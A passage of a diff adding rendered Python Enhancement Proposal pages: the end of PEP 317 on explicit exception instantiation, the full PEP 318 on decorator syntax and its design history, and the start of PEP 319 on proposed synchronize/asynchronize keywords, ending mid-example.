Three new warnings, all of category DeprecationWarning, are +to be issued to point out uses of raise which will become +incorrect under the proposed changes.

+

The first warning is issued when a raise statement is executed in +which the first expression evaluates to a string. The message for +this warning is:

+
raising strings will be impossible in the future
+
+
+

The second warning is issued when a raise statement is executed in +which the first expression evaluates to a class. The message for this +warning is:

+
raising classes will be impossible in the future
+
+
+

The third warning is issued when a raise statement with three +expressions is compiled. (Not, note, when it is executed; this is +important because the SyntaxError which this warning presages will +occur at compile-time.) The message for this warning is:

+
raising with three arguments will be impossible in the future
+
+
+

These warnings are to appear in Python 2.4, and disappear in Python +3.0, when the conditions which cause them are simply errors.

+
+
+
+

Examples

+
+

Code Using Implicit Instantiation

+

Code such as

+
class MyError(Exception):
+    pass
+
+raise MyError, 'spam'
+
+
+

will issue a warning when the raise statement is executed. The +raise statement should be changed to instantiate explicitly:

+
raise MyError('spam')
+
+
+
+
+

Code Using String Exceptions

+

Code such as

+
MyError = 'spam'
+raise MyError, 'eggs'
+
+
+

will issue a warning when the raise statement is executed. The +exception type should be changed to a class:

+
class MyError(Exception):
+    pass
+
+
+

and, as in the previous example, the raise statement should be +changed to instantiate explicitly

+
raise MyError('eggs')
+
+
+
+
+

Code Supplying a Traceback Object

+

Code such as

+
raise MyError, 'spam', mytraceback
+
+
+

will issue a warning when compiled. The statement should be changed +to

+
raise MyError('spam'), mytraceback
+
+
+

and the future statement

+
from __future__ import raise_with_two_args
+
+
+

should be added at the top of the module. Note that adding this +future statement also turns the other two warnings into errors, so the +changes described in the previous examples must also be applied.

+

The special case

+
raise sys.exc_type, sys.exc_value, sys.exc_traceback
+
+
+

(which is intended to re-raise a previous exception) should be changed +simply to

+
raise
+
+
+
+
+

A Failure of the Plan

+

It may occur that a raise statement which raises a string or +implicitly instantiates is not executed in production or testing +during the phase-in period for this PEP. In that case, it will not +issue any warnings, but will instead suddenly fail one day in Python +3.0 or a subsequent version. (The failure is that the wrong exception +gets raised, namely a TypeError complaining about the arguments to +raise, instead of the exception intended.)

+

Such cases can be made rarer by prolonging the phase-in period; they +cannot be made impossible short of issuing at compile-time a warning +for every raise statement.

+
+
+
+
+

Rejection

+

If this PEP were accepted, nearly all existing Python code would need +to be reviewed and probably revised; even if all the above arguments +in favour of explicit instantiation are accepted, the improvement in +clarity is too minor to justify the cost of doing the revision and the +risk of new bugs introduced thereby.

+

This proposal has therefore been rejected [6].

+

Note that string exceptions are slated for removal independently of +this proposal; what is rejected is the removal of implicit exception +instantiation.

+
+
+

Summary of Discussion

+

A small minority of respondents were in favour of the proposal, but +the dominant response was that any such migration would be costly +out of proportion to the putative benefit. As noted above, this +point is sufficient in itself to reject the PEP.

+
+

New-Style Exceptions

+

Implicit instantiation might conflict with future plans to allow +instances of new-style classes to be used as exceptions. In order to +decide whether to instantiate implicitly, the raise machinery must +determine whether the first argument is a class or an instance – but +with new-style classes there is no clear and strong distinction.

+

Under this proposal, the problem would be avoided because the +exception would already have been instantiated. However, there are +two plausible alternative solutions:

+
    +
  1. Require exception types to be subclasses of Exception, and +instantiate implicitly if and only if
    issubclass(firstarg, Exception)
    +
    +
    +
  2. Instantiate implicitly if and only if
    isinstance(firstarg, type)
    +
    +
    +
+

Thus eliminating implicit instantiation entirely is not necessary to +solve this problem.

+
+
+

Ugliness of Explicit Instantiation

+

Some respondents felt that the explicitly instantiating syntax is +uglier, especially in cases when no arguments are supplied to the +exception constructor:

+
raise TypeError()
+
+
+

The problem is particularly acute when the exception instance itself +is not of interest, that is, when the only relevant point is the +exception type:

+
try:
+    # ... deeply nested search loop ...
+        raise Found
+except Found:
+    # ...
+
+
+

In such cases the symmetry between raise and except can be +more expressive of the intent of the code.

+

Guido opined that the implicitly instantiating syntax is “a tad +prettier” even for cases with a single argument, since it has less +punctuation.

+
+
+

Performance Penalty of Warnings

+

Experience with deprecating apply() shows that use of the warning +framework can incur a significant performance penalty.

+

Code which instantiates explicitly would not be affected, since the +run-time checks necessary to determine whether to issue a warning are +exactly those which are needed to determine whether to instantiate +implicitly in the first place. That is, such statements are already +incurring the cost of these checks.

+

Code which instantiates implicitly would incur a large cost: timing +trials indicate that issuing a warning (whether it is suppressed or +not) takes about five times more time than simply instantiating, +raising, and catching an exception.

+

This penalty is mitigated by the fact that raise statements are +rarely on performance-critical execution paths.

+
+
+

Traceback Argument

+

As the proposal stands, it would be impossible to use the traceback +argument to raise conveniently with all 2.x versions of Python.

+

For compatibility with versions < 2.4, the three-argument form must be +used; but this form would produce warnings with versions >= 2.4. +Those warnings could be suppressed, but doing so is awkward because +the relevant type of warning is issued at compile-time.

+

If this PEP were still under consideration, this objection would be +met by extending the phase-in period. For example, warnings could +first be issued in 3.0, and become errors in some later release.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0317.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0318/index.html b/pep-0318/index.html new file mode 100644 index 00000000000..265eed5d1fb --- /dev/null +++ b/pep-0318/index.html @@ -0,0 +1,838 @@ + PEP 318 – Decorators for Functions and Methods | peps.python.org
+
+


+ + +
+
+
+

PEP 318 – Decorators for Functions and Methods

+
+
Author:
+
Kevin D. Smith <Kevin.Smith at theMorgue.org>, Jim J. Jewett, Skip Montanaro, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2003
+
Python-Version:
+
2.4
+
Post-History:
+
09-Jun-2003, 10-Jun-2003, 27-Feb-2004, 23-Mar-2004, 30-Aug-2004, +02-Sep-2004
+
+
+
+
+
+

WarningWarningWarning

+

This document is meant to describe the decorator syntax and the +process that resulted in the decisions that were made. It does not +attempt to cover the huge number of potential alternative syntaxes, +nor is it an attempt to exhaustively list all the positives and +negatives of each form.

+
+
+

Abstract

+

The current method for transforming functions and methods (for instance, +declaring them as a class or static method) is awkward and can lead to +code that is difficult to understand. Ideally, these transformations +should be made at the same point in the code where the declaration +itself is made. This PEP introduces new syntax for transformations of a +function or method declaration.

+
+
+

Motivation

+

The current method of applying a transformation to a function or method +places the actual transformation after the function body. For large +functions this separates a key component of the function’s behavior from +the definition of the rest of the function’s external interface. For +example:

+
def foo(self):
+    perform method operation
+foo = classmethod(foo)
+
+
+

This becomes less readable with longer methods. It also seems less +than pythonic to name the function three times for what is conceptually +a single declaration. A solution to this problem is to move the +transformation of the method closer to the method’s own declaration. +The intent of the new syntax is to replace

+
def foo(cls):
+    pass
+foo = synchronized(lock)(foo)
+foo = classmethod(foo)
+
+
+

with an alternative that places the decoration in the function’s +declaration:

+
@classmethod
+@synchronized(lock)
+def foo(cls):
+    pass
+
+
+

Modifying classes in this fashion is also possible, though the benefits +are not as immediately apparent. Almost certainly, anything which could +be done with class decorators could be done using metaclasses, but +using metaclasses is sufficiently obscure that there is some attraction +to having an easier way to make simple modifications to classes. For +Python 2.4, only function/method decorators are being added.

+

PEP 3129 proposes to add class decorators as of Python 2.6.
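For a feel of that trade-off, here is one and the same transformation written both ways; the registry example is our illustration, not from the PEP:

registry = {}

def register(cls):                 # class-decorator style (PEP 3129)
    registry[cls.__name__] = cls
    return cls

@register
class Plugin:
    pass

class RegisteringMeta(type):       # metaclass style: works, but obscure
    def __init__(cls, name, bases, namespace):
        type.__init__(cls, name, bases, namespace)
        registry[name] = cls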

+
+

Why Is This So Hard?

+

Two decorators (classmethod() and staticmethod()) have been +available in Python since version 2.2. It’s been assumed since +approximately that time that some syntactic support for them would +eventually be added to the language. Given this assumption, one might +wonder why it’s been so difficult to arrive at a consensus. Discussions +have raged off-and-on at times in both comp.lang.python and the +python-dev mailing list about how best to implement function decorators. +There is no one clear reason why this should be so, but a few problems +seem to be most divisive.

+
    +
  • Disagreement about where the “declaration of intent” belongs. Almost everyone agrees that decorating/transforming a function at the end of its definition is suboptimal. Beyond that there seems to be no clear consensus where to place this information.
  • Syntactic constraints. Python is a syntactically simple language with fairly strong constraints on what can and can’t be done without “messing things up” (both visually and with regards to the language parser). There’s no obvious way to structure this information so that people new to the concept will think, “Oh yeah, I know what you’re doing.” The best that seems possible is to keep new users from creating a wildly incorrect mental model of what the syntax means.
  • Overall unfamiliarity with the concept. For people who have a passing acquaintance with algebra (or even basic arithmetic) or have used at least one other programming language, much of Python is intuitive. Very few people will have had any experience with the decorator concept before encountering it in Python. There’s just no strong preexisting meme that captures the concept.
  • Syntax discussions in general appear to cause more contention than almost anything else. Readers are pointed to the ternary operator discussions that were associated with PEP 308 for another example of this.
+
+
+
+

Background

+

There is general agreement that syntactic support is preferable to the current state of affairs. Guido mentioned syntactic support for decorators in his DevDay keynote presentation at the 10th Python Conference, though he later said it was only one of several extensions he proposed there “semi-jokingly”. Michael Hudson raised the topic on python-dev shortly after the conference, attributing the initial bracketed syntax to an earlier proposal on comp.lang.python by Gareth McCaughan.

+

Class decorations seem like an obvious next step because class +definition and function definition are syntactically similar, +however Guido remains unconvinced, and class decorators will almost +certainly not be in Python 2.4.

+

The discussion continued on and off on python-dev from February +2002 through July 2004. Hundreds and hundreds of posts were made, +with people proposing many possible syntax variations. Guido took +a list of proposals to EuroPython 2004, where a discussion took +place. Subsequent to this, he decided that we’d have the Java-style +@decorator syntax, and this appeared for the first time in 2.4a2. +Barry Warsaw named this the ‘pie-decorator’ syntax, in honor of the +Pie-thon Parrot shootout which occurred around the same time as +the decorator syntax, and because the @ looks a little like a pie. +Guido outlined his case on Python-dev, including this piece +on some of the (many) rejected forms.

+
+
+

On the name ‘Decorator’

+

There’s been a number of complaints about the choice of the name +‘decorator’ for this feature. The major one is that the name is not +consistent with its use in the GoF book. The name ‘decorator’ +probably owes more to its use in the compiler area – a syntax tree is +walked and annotated. It’s quite possible that a better name may turn +up.

+
+
+

Design Goals

+

The new syntax should

+
    +
  • work for arbitrary wrappers, including user-defined callables and the existing builtins classmethod() and staticmethod(). This requirement also means that a decorator syntax must support passing arguments to the wrapper constructor
  • work with multiple wrappers per definition
  • make it obvious what is happening; at the very least it should be obvious that new users can safely ignore it when writing their own code
  • be a syntax “that … [is] easy to remember once explained”
  • not make future extensions more difficult
  • be easy to type; programs that use it are expected to use it very frequently
  • not make it more difficult to scan through code quickly. It should still be easy to search for all definitions, a particular definition, or the arguments that a function accepts
  • not needlessly complicate secondary support tools such as language-sensitive editors and other “toy parser tools out there”
  • allow future compilers to optimize for decorators. With the hope of a JIT compiler for Python coming into existence at some point this tends to require the syntax for decorators to come before the function definition
  • move from the end of the function, where it’s currently hidden, to the front where it is more in your face
+

Andrew Kuchling has links to a bunch of the discussions about +motivations and use cases in his blog. Particularly notable is Jim +Huginin’s list of use cases.

+
+
+

Current Syntax

+

The current syntax for function decorators as implemented in Python +2.4a2 is:

+
@dec2
+@dec1
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
def func(arg1, arg2, ...):
+    pass
+func = dec2(dec1(func))
+
+
+

without the intermediate assignment to the variable func. The +decorators are near the function declaration. The @ sign makes it clear +that something new is going on here.

+

The rationale for the order of application (bottom to top) is that it matches the usual order for function-application. In mathematics, composition of functions (g o f)(x) translates to g(f(x)). In Python, @g @f def foo() translates to foo=g(f(foo)).
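The ordering is easy to verify with two toy decorators (our illustration, not from the PEP):

def dec1(func):
    def inner():
        return 'dec1(%s)' % func()
    return inner

def dec2(func):
    def inner():
        return 'dec2(%s)' % func()
    return inner

@dec2
@dec1
def func():
    return 'func'

print(func())   # prints dec2(dec1(func)): dec1 is applied first, dec2 outermost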

+

The decorator statement is limited in what it can accept – arbitrary +expressions will not work. Guido preferred this because of a gut +feeling.

+

The current syntax also allows decorator declarations to call a +function that returns a decorator:

+
@decomaker(argA, argB, ...)
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
func = decomaker(argA, argB, ...)(func)
+
+
+

The rationale for having a function that returns a decorator is that +the part after the @ sign can be considered to be an expression +(though syntactically restricted to just a function), and whatever +that expression returns is called. See declaration arguments.
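A concrete (invented) decomaker makes the two-step call visible: the expression after the @ sign runs first and must return the actual decorator:

def decomaker(prefix):
    def decorator(func):           # this is what @decomaker(...) returns
        def inner(*args, **kwargs):
            return '%s: %s' % (prefix, func(*args, **kwargs))
        return inner
    return decorator

@decomaker('result')
def answer():
    return '42'

# answer() == 'result: 42', i.e. answer = decomaker('result')(answer)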

+
+
+

Syntax Alternatives

+

There have been a large number of different syntaxes proposed – +rather than attempting to work through these individual syntaxes, it’s +worthwhile to break the syntax discussion down into a number of areas. +Attempting to discuss each possible syntax individually would be an +act of madness, and produce a completely unwieldy PEP.

+
+

Decorator Location

+

The first syntax point is the location of the decorators. For the +following examples, we use the @syntax used in 2.4a2.

+

Decorators before the def statement are the first alternative, and the +syntax used in 2.4a2:

+
@classmethod
+def foo(arg1,arg2):
+    pass
+
+@accepts(int,int)
+@returns(float)
+def bar(low,high):
+    pass
+
+
+

There have been a number of objections raised to this location – the +primary one is that it’s the first real Python case where a line of code +has an effect on a following line. The syntax available in 2.4a3 +requires one decorator per line (in a2, multiple decorators could be +specified on the same line), and the final decision for 2.4 final stayed +one decorator per line.

+

People also complained that the syntax quickly got unwieldy when +multiple decorators were used. The point was made, though, that the +chances of a large number of decorators being used on a single function +were small and thus this was not a large worry.

+

Some of the advantages of this form are that the decorators live outside +the method body – they are obviously executed at the time the function +is defined.

+

Another advantage is that a prefix to the function definition fits +the idea of knowing about a change to the semantics of the code before +the code itself, thus you know how to interpret the code’s semantics +properly without having to go back and change your initial perceptions +if the syntax did not come before the function definition.

+

Guido decided he preferred having the decorators on the line before the ‘def’, because it was felt that a long argument list would mean that the decorators would be ‘hidden’.

+

The second form is the decorators between the def and the function name, +or the function name and the argument list:

+
def @classmethod foo(arg1,arg2):
+    pass
+
+def @accepts(int,int),@returns(float) bar(low,high):
+    pass
+
+def foo @classmethod (arg1,arg2):
+    pass
+
+def bar @accepts(int,int),@returns(float) (low,high):
+    pass
+
+
+

There are a couple of objections to this form. The first is that it +breaks easily ‘greppability’ of the source – you can no longer search +for ‘def foo(’ and find the definition of the function. The second, +more serious, objection is that in the case of multiple decorators, the +syntax would be extremely unwieldy.

+

The next form, which has had a number of strong proponents, is to have +the decorators between the argument list and the trailing : in the +‘def’ line:

+
def foo(arg1,arg2) @classmethod:
+    pass
+
+def bar(low,high) @accepts(int,int),@returns(float):
+    pass
+
+
+

Guido summarized the arguments against this form (many of which also +apply to the previous form) as:

+
    +
  • it hides crucial information (e.g. that it is a static method) after the signature, where it is easily missed
  • it’s easy to miss the transition between a long argument list and a long decorator list
  • it’s cumbersome to cut and paste a decorator list for reuse, because it starts and ends in the middle of a line
+

The next form is that the decorator syntax goes inside the method body at +the start, in the same place that docstrings currently live:

+
def foo(arg1,arg2):
+    @classmethod
+    pass
+
+def bar(low,high):
+    @accepts(int,int)
+    @returns(float)
+    pass
+
+
+

The primary objection to this form is that it requires “peeking inside” +the method body to determine the decorators. In addition, even though +the code is inside the method body, it is not executed when the method +is run. Guido felt that docstrings were not a good counter-example, and +that it was quite possible that a ‘docstring’ decorator could help move +the docstring to outside the function body.

+

The final form is a new block that encloses the method’s code. For this +example, we’ll use a ‘decorate’ keyword, as it makes no sense with the +@syntax.

+
decorate:
+    classmethod
+    def foo(arg1,arg2):
+        pass
+
+decorate:
+    accepts(int,int)
+    returns(float)
+    def bar(low,high):
+        pass
+
+
+

This form would result in inconsistent indentation for decorated and +undecorated methods. In addition, a decorated method’s body would start +three indent levels in.

+
+
+

Syntax forms

+
    +
  • @decorator:
    @classmethod
    +def foo(arg1,arg2):
    +    pass
    +
    +@accepts(int,int)
    +@returns(float)
    +def bar(low,high):
    +    pass
    +
    +
    +

    The major objections against this syntax are that the @ symbol is +not currently used in Python (and is used in both IPython and Leo), +and that the @ symbol is not meaningful. Another objection is that +this “wastes” a currently unused character (from a limited set) on +something that is not perceived as a major use.

    +
  • |decorator:
    |classmethod
    +def foo(arg1,arg2):
    +    pass
    +
    +|accepts(int,int)
    +|returns(float)
    +def bar(low,high):
    +    pass
    +
    +
    +

    This is a variant on the @decorator syntax – it has the advantage +that it does not break IPython and Leo. Its major disadvantage +compared to the @syntax is that the | symbol looks like both a capital +I and a lowercase l.

    +
  • list syntax:
    [classmethod]
    +def foo(arg1,arg2):
    +    pass
    +
    +[accepts(int,int), returns(float)]
    +def bar(low,high):
    +    pass
    +
    +
    +

    The major objection to the list syntax is that it’s currently +meaningful (when used in the form before the method). It’s also +lacking any indication that the expression is a decorator.

    +
  • list syntax using other brackets (<...>, [[...]], …):
    <classmethod>
    +def foo(arg1,arg2):
    +    pass
    +
    +<accepts(int,int), returns(float)>
    +def bar(low,high):
    +    pass
    +
    +
    +

    None of these alternatives gained much traction. The alternatives +which involve square brackets only serve to make it obvious that the +decorator construct is not a list. They do nothing to make parsing any +easier. The ‘<…>’ alternative presents parsing problems because ‘<’ +and ‘>’ already parse as un-paired. They present a further parsing +ambiguity because a right angle bracket might be a greater than symbol +instead of a closer for the decorators.

    +
  • decorate()

    The decorate() proposal was that no new syntax be implemented +– instead a magic function that used introspection to manipulate +the following function. Both Jp Calderone and Philip Eby produced +implementations of functions that did this. Guido was pretty firmly +against this – with no new syntax, the magicness of a function like +this is extremely high:

    +
    +
    Using functions with “action-at-a-distance” through sys.settraceback +may be okay for an obscure feature that can’t be had any other +way yet doesn’t merit changes to the language, but that’s not +the situation for decorators. The widely held view here is that +decorators need to be added as a syntactic feature to avoid the +problems with the postfix notation used in 2.2 and 2.3. Decorators +are slated to be an important new language feature and their +design needs to be forward-looking, not constrained by what can be +implemented in 2.3.
    +
  • new keyword (and block)

    This idea was the consensus alternate from comp.lang.python (more +on this in Community Consensus below.) Robert Brewer wrote up a +detailed J2 proposal document outlining the arguments in favor of +this form. The initial issues with this form are:

    +
      +
    • It requires a new keyword, and therefore a from __future__ +import decorators statement.
    • The choice of keyword is contentious. However using emerged +as the consensus choice, and is used in the proposal and +implementation.
    • The keyword/block form produces something that looks like a normal +code block, but isn’t. Attempts to use statements in this block +will cause a syntax error, which may confuse users.
    +

    A few days later, Guido rejected the proposal on two main grounds, +firstly:

    +
    +
    … the syntactic form of an indented block strongly +suggests that its contents should be a sequence of statements, but +in fact it is not – only expressions are allowed, and there is an +implicit “collecting” of these expressions going on until they can +be applied to the subsequent function definition. …
    +

    and secondly:

    +
    +
    … the keyword starting the line that heads a block +draws a lot of attention to it. This is true for “if”, “while”, +“for”, “try”, “def” and “class”. But the “using” keyword (or any +other keyword in its place) doesn’t deserve that attention; the +emphasis should be on the decorator or decorators inside the suite, +since those are the important modifiers to the function definition +that follows. …
    +

    Readers are invited to read the full response.

    +
  • Other forms

    There are plenty of other variants and proposals on the wiki page.

    +
+
+
+

Why @?

+

There is some history in Java using @ initially as a marker in Javadoc +comments and later in Java 1.5 for annotations, which are similar +to Python decorators. The fact that @ was previously unused as a token +in Python also means it’s clear there is no possibility of such code +being parsed by an earlier version of Python, leading to possibly subtle +semantic bugs. It also means that ambiguity of what is a decorator +and what isn’t is removed. That said, @ is still a fairly arbitrary +choice. Some have suggested using | instead.

+

For syntax options which use a list-like syntax (no matter where it +appears) to specify the decorators a few alternatives were proposed: +[|...|], *[...]*, and <...>.

+
+
+
+

Current Implementation, History

+

Guido asked for a volunteer to implement his preferred syntax, and Mark +Russell stepped up and posted a patch to SF. This new syntax was +available in 2.4a2.

+
@dec2
+@dec1
+def func(arg1, arg2, ...):
+    pass
+
+
+

This is equivalent to:

+
def func(arg1, arg2, ...):
+    pass
+func = dec2(dec1(func))
+
+
+

though without the intermediate creation of a variable named func.

+

The version implemented in 2.4a2 allowed multiple @decorator clauses +on a single line. In 2.4a3, this was tightened up to only allowing one +decorator per line.

+

A previous patch from Michael Hudson which implements the +list-after-def syntax is also still kicking around.

+

After 2.4a2 was released, in response to community reaction, Guido +stated that he’d re-examine a community proposal, if the community +could come up with a community consensus, a decent proposal, and an +implementation. After an amazing number of posts, collecting a vast +number of alternatives in the Python wiki, a community consensus +emerged (below). Guido subsequently rejected this alternate form, +but added:

+
+
In Python 2.4a3 (to be released this Thursday), everything remains +as currently in CVS. For 2.4b1, I will consider a change of @ to +some other single character, even though I think that @ has the +advantage of being the same character used by a similar feature +in Java. It’s been argued that it’s not quite the same, since @ +in Java is used for attributes that don’t change semantics. But +Python’s dynamic nature makes that its syntactic elements never mean +quite the same thing as similar constructs in other languages, and +there is definitely significant overlap. Regarding the impact on +3rd party tools: IPython’s author doesn’t think there’s going to be +much impact; Leo’s author has said that Leo will survive (although +it will cause him and his users some transitional pain). I actually +expect that picking a character that’s already used elsewhere in +Python’s syntax might be harder for external tools to adapt to, +since parsing will have to be more subtle in that case. But I’m +frankly undecided, so there’s some wiggle room here. I don’t want +to consider further syntactic alternatives at this point: the buck +has to stop at some point, everyone has had their say, and the show +must go on.
+
+

Community Consensus

+

This section documents the rejected J2 syntax, and is included for +historical completeness.

+

The consensus that emerged on comp.lang.python was the proposed J2 +syntax (the “J2” was how it was referenced on the PythonDecorators wiki +page): the new keyword using prefixing a block of decorators before +the def statement. For example:

+
using:
+    classmethod
+    synchronized(lock)
+def func(cls):
+    pass
+
+
+

The main arguments for this syntax fall under the “readability counts” +doctrine. In brief, they are:

+
    +
  • A suite is better than multiple @lines. The using keyword and block transforms the single-block def statement into a multiple-block compound construct, akin to try/finally and others.
  • A keyword is better than punctuation for a new token. A keyword matches the existing use of tokens. No new token category is necessary. A keyword distinguishes Python decorators from Java annotations and .Net attributes, which are significantly different beasts.
+

Robert Brewer wrote a detailed proposal for this form, and Michael +Sparks produced a patch.

+

As noted previously, Guido rejected this form, outlining his problems +with it in a message to python-dev and comp.lang.python.

+
+
+
+

Examples

+

Much of the discussion on comp.lang.python and the python-dev +mailing list focuses on the use of decorators as a cleaner way to use +the staticmethod() and classmethod() builtins. This capability +is much more powerful than that. This section presents some examples of +use.

+
    +
  1. Define a function to be executed at exit. Note that the function +isn’t actually “wrapped” in the usual sense.
    def onexit(f):
    +    import atexit
    +    atexit.register(f)
    +    return f
    +
    +@onexit
    +def func():
    +    ...
    +
    +
    +

    Note that this example is probably not suitable for real usage, but +is for example purposes only.

    +
  2. Define a class with a singleton instance. Note that once the class disappears enterprising programmers would have to be more creative to create more instances. (From Shane Hathaway on python-dev.)
    def singleton(cls):
    +    instances = {}
    +    def getinstance():
    +        if cls not in instances:
    +            instances[cls] = cls()
    +        return instances[cls]
    +    return getinstance
    +
    +@singleton
    +class MyClass:
    +    ...
    +
    +
    +
  3. Add attributes to a function. (Based on an example posted by Anders Munch on python-dev.)
    def attrs(**kwds):
    +    def decorate(f):
    +        for k in kwds:
    +            setattr(f, k, kwds[k])
    +        return f
    +    return decorate
    +
    +@attrs(versionadded="2.2",
    +       author="Guido van Rossum")
    +def mymethod(f):
    +    ...
    +
    +
    +
  4. Enforce function argument and return types. Note that this copies the func_name attribute from the old to the new function. func_name was made writable in Python 2.4a3:
    def accepts(*types):
    +    def check_accepts(f):
    +        assert len(types) == f.func_code.co_argcount
    +        def new_f(*args, **kwds):
    +            for (a, t) in zip(args, types):
    +                assert isinstance(a, t), \
    +                       "arg %r does not match %s" % (a,t)
    +            return f(*args, **kwds)
    +        new_f.func_name = f.func_name
    +        return new_f
    +    return check_accepts
    +
    +def returns(rtype):
    +    def check_returns(f):
    +        def new_f(*args, **kwds):
    +            result = f(*args, **kwds)
    +            assert isinstance(result, rtype), \
    +                   "return value %r does not match %s" % (result,rtype)
    +            return result
    +        new_f.func_name = f.func_name
    +        return new_f
    +    return check_returns
    +
    +@accepts(int, (int,float))
    +@returns((int,float))
    +def func(arg1, arg2):
    +    return arg1 * arg2
    +
    +
    +
  5. Declare that a class implements a particular (set of) interface(s). This is from a posting by Bob Ippolito on python-dev based on experience with PyProtocols.
    def provides(*interfaces):
    +     """
    +     An actual, working, implementation of provides for
    +     the current implementation of PyProtocols.  Not
    +     particularly important for the PEP text.
    +     """
    +     def provides(typ):
    +         declareImplementation(typ, instancesProvide=interfaces)
    +         return typ
    +     return provides
    +
    +class IBar(Interface):
    +     """Declare something about IBar here"""
    +
    +@provides(IBar)
    +class Foo(object):
    +        """Implement something here..."""
    +
    +
    +
+

Of course, all these examples are possible today, though without +syntactic support.

+
+
+

(No longer) Open Issues

+
    +
  1. It’s not yet certain that class decorators will be incorporated +into the language at a future point. Guido expressed skepticism about +the concept, but various people have made some strong arguments +(search for PEP 318 -- posting draft) on their behalf in +python-dev. It’s exceedingly unlikely that class decorators +will be in Python 2.4.

    PEP 3129 proposes to add class decorators as of Python 2.6.

    +
  2. The choice of the @ character will be re-examined before Python 2.4b1.

    In the end, the @ character was kept.

    +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0318.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0319/index.html b/pep-0319/index.html new file mode 100644 index 00000000000..d79edad2fe9 --- /dev/null +++ b/pep-0319/index.html @@ -0,0 +1,602 @@ + PEP 319 – Python Synchronize/Asynchronize Block | peps.python.org
+
+


+ + +
+
+
+

PEP 319 – Python Synchronize/Asynchronize Block

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Feb-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes adding two new keywords to Python, ‘synchronize’ +and ‘asynchronize’.

+
+
+

Pronouncement

+

This PEP is rejected in favor of PEP 343.

+
+
The ‘synchronize’ Keyword
The concept of code synchronization in Python is too low-level. +To synchronize code a programmer must be aware of the details of +the following pseudo-code pattern:
initialize_lock()
+
+...
+
+acquire_lock()
+try:
+    change_shared_data()
+finally:
+    release_lock()
+
+
+

This synchronized block pattern is not the only pattern (more +discussed below) but it is very common. This PEP proposes +replacing the above code with the following equivalent:

+
synchronize:
+    change_shared_data()
+
+
+

The advantages of this scheme are simpler syntax and less room for +user error. Currently users are required to write code about +acquiring and releasing thread locks in ‘try/finally’ blocks; +errors in this code can cause notoriously difficult concurrent +thread locking issues.

+
+
The ‘asynchronize’ Keyword
While executing a ‘synchronize’ block of code a programmer may +want to “drop back” to running asynchronously momentarily to run +blocking input/output routines or something else that might take an +indeterminate amount of time and does not require synchronization. +This code usually follows the pattern:
initialize_lock()
+
+...
+
+acquire_lock()
+try:
+    change_shared_data()
+    release_lock()             # become async
+    do_blocking_io()
+    acquire_lock()             # sync again
+    change_shared_data2()
+
+finally:
+    release_lock()
+
+
+

The asynchronous section of the code is not very obvious visually, +so it is marked up with comments. Using the proposed +‘asynchronize’ keyword this code becomes much cleaner, easier to +understand, and less prone to error:

+
synchronize:
+    change_shared_data()
+
+    asynchronize:
+       do_blocking_io()
+
+    change_shared_data2()
+
+
+

Encountering an ‘asynchronize’ keyword inside a non-synchronized +block can raise either an error or issue a warning (as all code +blocks are implicitly asynchronous anyway). It is important to +note that the above example is not the same as:

+
synchronize:
+    change_shared_data()
+
+do_blocking_io()
+
+synchronize:
+    change_shared_data2()
+
+
+

because both synchronized blocks of code may be running inside the same iteration of a loop. Consider:

+
while in_main_loop():
+    synchronize:
+        change_shared_data()
+
+        asynchronize:
+           do_blocking_io()
+
+        change_shared_data2()
+
+
+

Many threads may be looping through this code. Without the +‘asynchronize’ keyword one thread cannot stay in the loop and +release the lock at the same time while blocking IO is going on. +This pattern of releasing locks inside a main loop to do blocking +IO is used extensively inside the CPython interpreter itself.

+
+
+
+
+

Synchronization Targets

+

As proposed the ‘synchronize’ and ‘asynchronize’ keywords +synchronize a block of code. However programmers may want to +specify a target object that threads synchronize on. Any object +can be a synchronization target.

+

Consider a two-way queue object: two different objects are used by +the same ‘synchronize’ code block to synchronize both queues +separately in the ‘get’ method:

+
class TwoWayQueue:
+    def __init__(self):
+        self.front = []
+        self.rear = []
+
+    def putFront(self, item):
+        self.put(item, self.front)
+
+    def getFront(self):
+        item = self.get(self.front)
+        return item
+
+    def putRear(self, item):
+        self.put(item, self.rear)
+
+    def getRear(self):
+        item = self.get(self.rear)
+        return item
+
+    def put(self, item, queue):
+        synchronize queue:
+            queue.append(item)
+
+    def get(self, queue):
+        synchronize queue:
+            item = queue[0]
+            del queue[0]
+            return item
+
+
+

Here is the equivalent code in Python as it is now without a +‘synchronize’ keyword:

+
import thread
+
+class LockableQueue:
+
+    def __init__(self):
+        self.queue = []
+        self.lock = thread.allocate_lock()
+
+class TwoWayQueue:
+    def __init__(self):
+        self.front = LockableQueue()
+        self.rear = LockableQueue()
+
+    def putFront(self, item):
+        self.put(item, self.front)
+
+    def getFront(self):
+        item = self.get(self.front)
+        return item
+
+    def putRear(self, item):
+        self.put(item, self.rear)
+
+    def getRear(self):
+        item = self.get(self.rear)
+        return item
+
+    def put(self, item, queue):
+        queue.lock.acquire()
+        try:
+            queue.queue.append(item)
+        finally:
+            queue.lock.release()
+
+    def get(self, queue):
+        queue.lock.acquire()
+        try:
+            item = queue.queue[0]
+            del queue.queue[0]
+            return item
+        finally:
+            queue.lock.release()
+
+
+

The last example had to define an extra class to associate a lock with the queue, whereas in the first example the ‘synchronize’ keyword does this association internally and transparently.

+
+
+

Other Patterns that Synchronize

+

There are some situations where the ‘synchronize’ and +‘asynchronize’ keywords cannot entirely replace the use of lock +methods like acquire and release. Some examples are if the +programmer wants to provide arguments for acquire or if a lock +is acquired in one code block but released in another, as shown +below.

+

Here is a class from Zope modified to use both the ‘synchronize’ +and ‘asynchronize’ keywords and also uses a pool of explicit locks +that are acquired and released in different code blocks and thus +don’t use ‘synchronize’:

+
import thread
+from ZServerPublisher import ZServerPublisher
+
+class ZRendevous:
+
+    def __init__(self, n=1):
+        pool=[]
+        self._lists=pool, [], []
+
+        synchronize:
+            while n > 0:
